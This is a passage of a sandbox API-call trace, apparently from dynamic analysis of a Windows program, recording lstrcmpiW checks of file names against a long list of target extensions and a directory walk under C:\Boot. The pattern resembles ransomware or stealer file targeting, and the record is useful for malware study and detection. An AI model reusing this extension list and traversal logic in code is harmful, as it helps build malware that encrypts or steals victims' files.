[0284.671] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0284.671] lstrlenW (lpString=".cdr") returned 4 [0284.671] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0284.671] lstrlenW (lpString=".cer") returned 4 [0284.671] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0284.671] lstrlenW (lpString=".cf") returned 3 [0284.671] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0284.671] lstrlenW (lpString=".cfc") returned 4 [0284.671] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0284.671] lstrlenW (lpString=".cfm") returned 4 [0284.672] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0284.672] lstrlenW (lpString=".cfml") returned 5 [0284.672] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0284.672] lstrlenW (lpString=".cfu") returned 4 [0284.672] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0284.672] lstrlenW (lpString=".chm") returned 4 [0284.672] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0284.672] lstrlenW (lpString=".cin") returned 4 [0284.672] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0284.672] lstrlenW (lpString=".class") returned 6 [0284.672] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0284.672] lstrlenW (lpString=".clx") returned 4 [0284.672] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0284.672] lstrlenW (lpString=".config") returned 7 [0284.672] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0284.672] lstrlenW (lpString=".cpp") returned 4 [0284.672] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0284.672] lstrlenW (lpString=".cr2") returned 4 [0284.672] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0284.672] lstrlenW (lpString=".crt") returned 4 [0284.672] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0284.672] lstrlenW (lpString=".crw") returned 4 [0284.672] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0284.672] lstrlenW (lpString=".cs") returned 3 [0284.673] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0284.673] lstrlenW (lpString=".css") returned 4 [0284.673] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0284.673] lstrlenW (lpString=".csv") returned 4 [0284.673] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0284.673] lstrlenW (lpString=".cub") returned 4 [0284.673] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0284.673] lstrlenW (lpString=".dae") returned 4 [0284.673] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0284.673] lstrlenW (lpString=".dat") returned 4 [0284.673] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0284.673] lstrlenW (lpString=".db") returned 3 [0284.673] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0284.673] lstrlenW (lpString=".dbf") returned 4 [0284.673] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.673] lstrlenW (lpString=".dbx") returned 4 [0284.673] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0284.673] lstrlenW (lpString=".dc3") returned 4 [0284.673] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0284.673] lstrlenW (lpString=".dcm") returned 4 [0284.673] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0284.674] lstrlenW (lpString=".dcr") returned 4 [0284.674] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0284.674] lstrlenW (lpString=".der") returned 4 [0284.674] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0284.674] lstrlenW (lpString=".dib") returned 4 [0284.674] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0284.674] lstrlenW (lpString=".dic") returned 4 [0284.674] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0284.674] lstrlenW (lpString=".dif") returned 4 [0284.674] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0284.674] lstrlenW (lpString=".divx") returned 5 [0284.674] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0284.674] lstrlenW (lpString=".djvu") returned 5 [0284.674] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0284.674] lstrlenW (lpString=".dng") returned 4 [0284.674] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0284.674] lstrlenW (lpString=".doc") returned 4 [0284.674] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.674] lstrlenW (lpString=".docm") returned 5 [0284.674] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0284.674] lstrlenW (lpString=".docx") returned 5 [0284.674] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.674] lstrlenW (lpString=".dot") returned 4 [0284.675] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0284.675] lstrlenW (lpString=".dotm") returned 5 [0284.675] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0284.675] lstrlenW (lpString=".dotx") returned 5 [0284.675] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0284.675] lstrlenW (lpString=".dpx") returned 4 [0284.675] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0284.675] lstrlenW (lpString=".dqy") returned 4 [0284.675] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0284.675] lstrlenW (lpString=".dsn") returned 4 [0284.675] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0284.675] lstrlenW (lpString=".dt") returned 3 [0284.675] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0284.675] lstrlenW (lpString=".dtd") returned 4 [0284.675] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0284.675] lstrlenW (lpString=".dwg") returned 4 [0284.675] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0284.675] lstrlenW (lpString=".dwt") returned 4 [0284.675] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0284.675] lstrlenW (lpString=".dx") returned 3 [0284.675] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0284.675] lstrlenW (lpString=".dxf") returned 4 [0284.675] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0284.676] lstrlenW (lpString=".edml") returned 5 [0284.676] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0284.676] lstrlenW (lpString=".efd") returned 4 [0284.676] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0284.676] lstrlenW (lpString=".elf") returned 4 [0284.676] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0284.676] lstrlenW (lpString=".emf") returned 4 [0284.676] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0284.676] lstrlenW (lpString=".emz") returned 4 [0284.676] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0284.676] lstrlenW (lpString=".epf") returned 4 [0284.676] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0284.676] lstrlenW (lpString=".eps") returned 4 [0284.676] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0284.676] lstrlenW (lpString=".epsf") returned 5 [0284.676] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0284.676] lstrlenW (lpString=".epsp") returned 5 [0284.676] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0284.676] lstrlenW (lpString=".erf") returned 4 [0284.676] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0284.676] lstrlenW (lpString=".exr") returned 4 [0284.676] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0284.676] lstrlenW (lpString=".f4v") returned 4 [0284.676] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0284.676] lstrlenW (lpString=".fido") returned 5 [0284.676] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0284.677] lstrlenW (lpString=".flm") returned 4 [0284.677] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".flv") returned 4 [0284.677] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".frm") returned 4 [0284.677] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".fxg") returned 4 [0284.677] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".geo") returned 4 [0284.677] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".gif") returned 4 [0284.677] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".grs") returned 4 [0284.677] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".gz") returned 3 [0284.677] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0284.677] lstrlenW (lpString=".h") returned 2 [0284.677] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0284.677] lstrlenW (lpString=".hdr") returned 4 [0284.677] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".hpp") returned 4 [0284.677] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".hta") returned 4 [0284.677] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".htc") returned 4 [0284.677] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0284.677] lstrlenW (lpString=".htm") returned 4 [0284.678] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0284.678] lstrlenW (lpString=".html") returned 5 [0284.678] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0284.678] lstrlenW (lpString=".icb") returned 4 [0284.678] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0284.678] lstrlenW (lpString=".ics") returned 4 [0284.678] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0284.678] lstrlenW (lpString=".iff") returned 4 [0284.678] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0284.678] lstrlenW (lpString=".inc") returned 4 [0284.678] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0284.678] lstrlenW (lpString=".indd") returned 5 [0284.700] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0284.700] lstrlenW (lpString=".ini") returned 4 [0284.700] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0284.700] lstrlenW (lpString=".iqy") returned 4 [0284.700] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0284.700] lstrlenW (lpString=".j2c") returned 4 [0284.700] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0284.700] lstrlenW (lpString=".j2k") returned 4 [0284.700] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0284.700] lstrlenW (lpString=".java") returned 5 [0284.700] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0284.700] lstrlenW (lpString=".jp2") returned 4 [0284.700] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0284.700] lstrlenW (lpString=".jpc") returned 4 [0284.700] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0284.700] lstrlenW (lpString=".jpe") returned 4 [0284.701] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0284.701] lstrlenW (lpString=".jpeg") returned 5 [0284.701] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0284.701] lstrlenW (lpString=".jpf") returned 4 [0284.701] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0284.701] lstrlenW (lpString=".jpg") returned 4 [0284.701] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.701] lstrlenW (lpString=".jpx") returned 4 [0284.701] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0284.701] lstrlenW (lpString=".js") returned 3 [0284.701] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0284.701] lstrlenW (lpString=".jsf") returned 4 [0284.701] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0284.701] lstrlenW (lpString=".json") returned 5 [0284.701] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0284.701] lstrlenW (lpString=".jsp") returned 4 [0284.701] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0284.701] lstrlenW (lpString=".kdc") returned 4 [0284.701] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0284.701] lstrlenW (lpString=".kmz") returned 4 [0284.701] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0284.701] lstrlenW (lpString=".kwm") returned 4 [0284.701] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0284.701] lstrlenW (lpString=".lasso") returned 6 [0284.701] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0284.701] lstrlenW (lpString=".lbi") returned 4 [0284.701] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0284.701] lstrlenW (lpString=".lgf") returned 4 [0284.701] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".lgp") returned 4 [0284.702] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".log") returned 4 [0284.702] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".m1v") returned 4 [0284.702] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".m4a") returned 4 [0284.702] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".m4v") returned 4 [0284.702] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".max") returned 4 [0284.702] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".md") returned 3 [0284.702] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0284.702] lstrlenW (lpString=".mda") returned 4 [0284.702] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".mdb") returned 4 [0284.702] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".mde") returned 4 [0284.702] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".mdf") returned 4 [0284.702] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".mdw") returned 4 [0284.702] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".mef") returned 4 [0284.702] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".mft") returned 4 [0284.702] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0284.702] lstrlenW (lpString=".mfw") returned 4 [0284.703] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".mht") returned 4 [0284.703] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".mhtml") returned 6 [0284.703] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0284.703] lstrlenW (lpString=".mka") returned 4 [0284.703] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".mkidx") returned 6 [0284.703] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0284.703] lstrlenW (lpString=".mkv") returned 4 [0284.703] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".mos") returned 4 [0284.703] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".mov") returned 4 [0284.703] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".mp3") returned 4 [0284.703] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".mp4") returned 4 [0284.703] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".mpeg") returned 5 [0284.703] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0284.703] lstrlenW (lpString=".mpg") returned 4 [0284.703] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".mpv") returned 4 [0284.703] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".mrw") returned 4 [0284.703] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0284.703] lstrlenW (lpString=".msg") returned 4 [0284.704] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0284.704] lstrlenW (lpString=".mxl") returned 4 [0284.704] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".myd") returned 4 [0284.704] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".myi") returned 4 [0284.704] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".nef") returned 4 [0284.704] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".nrw") returned 4 [0284.704] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".obj") returned 4 [0284.704] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".odb") returned 4 [0284.704] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".odc") returned 4 [0284.704] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".odm") returned 4 [0284.704] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".odp") returned 4 [0284.704] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".ods") returned 4 [0284.704] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".oft") returned 4 [0284.704] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".one") returned 4 [0284.704] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0284.704] lstrlenW (lpString=".onepkg") returned 7 [0284.705] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0284.705] lstrlenW (lpString=".onetoc2") returned 8 [0284.705] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0284.705] lstrlenW (lpString=".opt") returned 4 [0284.705] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".oqy") returned 4 [0284.705] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".orf") returned 4 [0284.705] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".p12") returned 4 [0284.705] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".p7b") returned 4 [0284.705] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".p7c") returned 4 [0284.705] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".pam") returned 4 [0284.705] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".pbm") returned 4 [0284.705] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".pct") returned 4 [0284.705] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".pcx") returned 4 [0284.705] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".pdd") returned 4 [0284.705] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".pdf") returned 4 [0284.705] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.705] lstrlenW (lpString=".pdp") returned 4 [0284.706] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0284.706] lstrlenW (lpString=".pef") returned 4 [0284.706] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0284.706] lstrlenW (lpString=".pem") returned 4 [0284.706] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0284.706] lstrlenW (lpString=".pff") returned 4 [0284.706] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0284.706] lstrlenW (lpString=".pfm") returned 4 [0284.706] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0284.706] lstrlenW (lpString=".pfx") returned 4 [0284.706] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0284.706] lstrlenW (lpString=".pgm") returned 4 [0284.706] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0284.706] lstrlenW (lpString=".php") returned 4 [0284.706] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0284.706] lstrlenW (lpString=".php3") returned 5 [0284.706] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0284.706] lstrlenW (lpString=".php4") returned 5 [0284.706] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0284.706] lstrlenW (lpString=".php5") returned 5 [0284.706] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0284.706] lstrlenW (lpString=".phtml") returned 6 [0284.706] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0284.706] lstrlenW (lpString=".pict") returned 5 [0284.706] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0284.706] lstrlenW (lpString=".pl") returned 3 [0284.706] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0284.706] lstrlenW (lpString=".pls") returned 4 [0284.706] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0284.707] lstrlenW (lpString=".pm") returned 3 [0284.707] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0284.707] lstrlenW (lpString=".png") returned 4 [0284.707] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0284.707] lstrlenW (lpString=".pnm") returned 4 [0284.707] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0284.707] lstrlenW (lpString=".pot") returned 4 [0284.707] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0284.707] lstrlenW (lpString=".potm") returned 5 [0284.707] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0284.707] lstrlenW (lpString=".potx") returned 5 [0284.707] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0284.707] lstrlenW (lpString=".ppa") returned 4 [0284.707] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0284.707] lstrlenW (lpString=".ppam") returned 5 [0284.707] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0284.707] lstrlenW (lpString=".ppm") returned 4 [0284.707] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0284.707] lstrlenW (lpString=".pps") returned 4 [0284.707] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0284.707] lstrlenW (lpString=".ppsm") returned 5 [0284.707] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0284.707] lstrlenW (lpString=".ppt") returned 4 [0284.707] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.707] lstrlenW (lpString=".pptm") returned 5 [0284.707] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0284.707] lstrlenW (lpString=".pptx") returned 5 [0284.707] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0284.708] lstrlenW (lpString=".prn") returned 4 [0284.708] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0284.708] lstrlenW (lpString=".ps") returned 3 [0284.708] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0284.708] lstrlenW (lpString=".psb") returned 4 [0284.708] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0284.708] lstrlenW (lpString=".psd") returned 4 [0284.708] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0284.708] lstrlenW (lpString=".pst") returned 4 [0284.708] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0284.708] lstrlenW (lpString=".ptx") returned 4 [0284.708] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0284.708] lstrlenW (lpString=".pub") returned 4 [0284.708] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0284.708] lstrlenW (lpString=".pwm") returned 4 [0284.708] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0284.708] lstrlenW (lpString=".pxr") returned 4 [0284.708] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0284.708] lstrlenW (lpString=".py") returned 3 [0284.708] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0284.708] lstrlenW (lpString=".qt") returned 3 [0284.708] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0284.708] lstrlenW (lpString=".r3d") returned 4 [0284.708] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0284.709] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.709] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.709] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0284.709] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.710] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="de-DE", cAlternateFileName="")) returned 1 [0284.710] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.710] lstrlenW (lpString="C:\\Boot\\de-DE") returned 13 [0284.710] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0284.710] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.710] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: 